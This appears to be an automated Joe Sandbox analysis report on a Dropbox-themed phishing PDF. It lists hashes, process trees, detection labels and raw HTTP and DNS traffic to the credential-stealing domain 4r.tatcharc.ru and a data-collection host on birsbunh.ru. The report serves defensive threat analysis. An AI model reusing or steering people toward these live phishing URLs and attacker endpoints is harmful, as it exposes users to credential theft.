Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A file has been sent to you via DROPBOX.pdf

Overview

General Information

Sample name:A file has been sent to you via DROPBOX.pdf
Analysis ID:1577794
MD5:7a6b0a9aae536133717fae29a8a5c041
SHA1:2fe6e693f0614b87037a1b9b221576233d0f5d0e
SHA256:8efaa5b41b40f4a91fbc502e90cd6adc9b320574b3739f4f8cff30219c13c1c7
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
IP address seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 5064 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\A file has been sent to you via DROPBOX.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7420 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1728,i,8237484978916821895,3345354816588044964,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 8824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://4R.tatcharc.ru/hdlV/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 9008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1992,i,12933209959549165544,4641154033968783078,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://4r.tatcharc.ru/hdlV/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://4R.tatcharc.ru/hdlV/)Avira URL Cloud: Label: phishing
Source: https://4r.tatcharc.ru/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: PDF documentJoe Sandbox AI: Page contains button: 'ACCESS DOCUMENT' Source: 'PDF document'
Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'access document'
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://4r.tatcharc.ru/hdlV/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. These behaviors are highly suspicious and indicate potential malicious intent.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://4r.tatcharc.ru/hdlV/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://4r.tatcharc.ru/hdlV/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a malicious domain (outlook.com) upon certain conditions. These behaviors are highly suspicious and indicate a potential phishing or malicious intent.
Source: https://4r.tatcharc.ru/hdlV/HTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownUDP traffic detected without corresponding DNS query: 40.81.94.65
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hdlV/ HTTP/1.1Host: 4r.tatcharc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f40fce70d2b43c1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 4r.tatcharc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://4r.tatcharc.ru/hdlV/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InMyaWFCT1hqZEVieitranVsVGJQNWc9PSIsInZhbHVlIjoiaCtBZENueWsraWUrZ2JYa082M1I4OTUwa3pwSzA0Qnhla1kxSVpkN2Z5WHpXTDF2alUyd0QrdVJBSXMrNzMrZEdLUms2ci90V05ialpRQ05IeTJ1cFVFM0JQK3M0eE9aMU5VcGtZdU5kV0tiNUxDQnltZ0VkVUxERlM5bUhNd00iLCJtYWMiOiI1YTI5MmZkYzM4ZjE2ZDY0NTU1MjAyYzIwOGU2ZDY2NTM4NDY0ZDc0OWFhMWZhZmFmOTYyMDhiNTg3YTQ3MTU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVyeUhkazdFOUVpRHR4UEpVVk52VkE9PSIsInZhbHVlIjoiNEdEZmZEWUlnZ2pKUDVZclMxZFhVbVBiUldHMXh5c2djUGQ3Sis2QzhMbk9KSU9hUHZEVlk2VG1MQmFIWThYckMvTmVuMFZ1N1pMOXBhT0QyQW5vdDQxWTV5STdBTXJXYTBjWndhN0hBNnJHY1dFU1R2RzJYRTBWNzNPNHRqNXkiLCJtYWMiOiIxYzBjY2RjZjRmZWE0Yjc5Y2Y3MDBlNTk5OTAwYTJjMDk5ZTNkZTg4OTZiZTRhMWMwNzljZWM0Mzg4ZjhlNGJiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f40fce70d2b43c1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f40fce70d2b43c1/1734544156660/e48b08b797227e0d4a3633050dffc9324e8e3ede998da3808dab9e337ca5ef1b/WEQGbHJaCLJFXt6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2815371938891542802263491yJBPbQZLSFPTSJAWIKGTDOOOEEOMQPMQZPNTEEAALCAFSAAXYGMKJTTGBHYMNGSV HTTP/1.1Host: kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://4r.tatcharc.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.outlook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2815371938891542802263491yJBPbQZLSFPTSJAWIKGTDOOOEEOMQPMQZPNTEEAALCAFSAAXYGMKJTTGBHYMNGSV HTTP/1.1Host: kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: outlook.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /owa/ HTTP/1.1Host: outlook.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://4r.tatcharc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: 4r.tatcharc.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: www.outlook.com
Source: global trafficDNS traffic detected: DNS query: outlook.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
